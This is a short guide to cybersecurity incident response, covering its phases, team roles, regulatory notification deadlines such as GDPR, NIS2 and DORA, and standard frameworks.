Why It Matters
Every organization will experience a security incident. The question is not if but when. Organizations with a tested incident response plan contain breaches 54 days faster and save an average of $2.66 million compared to those without one (IBM Cost of a Data Breach, 2023). Multiple regulations now mandate formal incident response capabilities.
The Six Phases (NIST Framework)
1. Preparation
- Develop and document the incident response plan
- Establish the incident response team (IRT) with clear roles
- Deploy detection tools (SIEM, EDR, IDS)
- Conduct training and tabletop exercises
- Prepare communication templates and contact lists
2. Detection and Analysis
- Monitor alerts from security tools
- Triage and classify incidents by severity
- Determine the scope — what systems, data, and users are affected
- Document the timeline of events
- Decide whether to escalate
3. Containment
- Short-term containment — isolate affected systems to stop the spread
- Long-term containment — apply temporary fixes while preparing for eradication
- Preserve evidence for forensic analysis
- Decide on communication strategy
4. Eradication
- Remove the root cause (malware, unauthorized access, vulnerability)
- Patch exploited vulnerabilities
- Reset compromised credentials
- Verify no persistence mechanisms remain
5. Recovery
- Restore systems from clean backups
- Monitor closely for signs of re-compromise
- Gradually return to normal operations
- Verify data integrity
6. Lessons Learned
- Conduct a post-incident review within 1–2 weeks
- Document what happened, what worked, what didn't
- Update the incident response plan based on findings
- Share relevant intelligence with peers and authorities
Regulatory Reporting Timelines
| Regulation | Notification Deadline |
|---|---|
| GDPR | 72 hours to supervisory authority (Article 33) |
| NIS2 | 24 hours (early warning), 72 hours (full notification), 1 month (final report) |
| DORA | 4 hours (initial), 72 hours (intermediate), 1 month (final) |
| CIRCIA | 72 hours for incidents, 24 hours for ransom payments |
| HIPAA | 60 days for breaches affecting 500+ individuals |
| SEC Reg S-P | 30 days to affected individuals |
Incident Response Team Roles
- Incident Commander — overall coordination and decision-making
- Technical Lead — forensic analysis, containment, eradication
- Communications Lead — internal and external communications, media
- Legal/Compliance — regulatory notifications, legal obligations, evidence preservation
- Business Liaison — impact assessment, business continuity coordination
- DPO — data protection implications, authority notifications (GDPR)
Key Frameworks
- NIST SP 800-61 — Computer Security Incident Handling Guide
- ISO/IEC 27035 — Information Security Incident Management
- SANS Incident Handling Process — widely adopted six-step methodology
- ENISA Incident Response Guidelines — EU-specific guidance